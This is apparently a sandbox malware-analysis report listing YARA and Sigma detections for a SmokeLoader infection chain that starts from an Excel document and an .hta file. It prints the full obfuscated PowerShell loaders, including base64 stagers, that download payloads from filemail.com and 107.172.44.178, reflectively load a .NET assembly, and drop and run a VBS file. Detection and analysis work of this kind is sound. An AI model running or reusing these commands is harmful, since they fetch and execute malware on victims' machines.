C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    00000022.00000002.567719148.0000000000261000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        Click to see the 4 entries
        SourceRuleDescriptionAuthorStrings
        30.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT
          Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3224, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat[1].hta
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 3960, ProcessName: wscript.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", CommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0c
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3224, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3544, ProcessName: mshta.exe
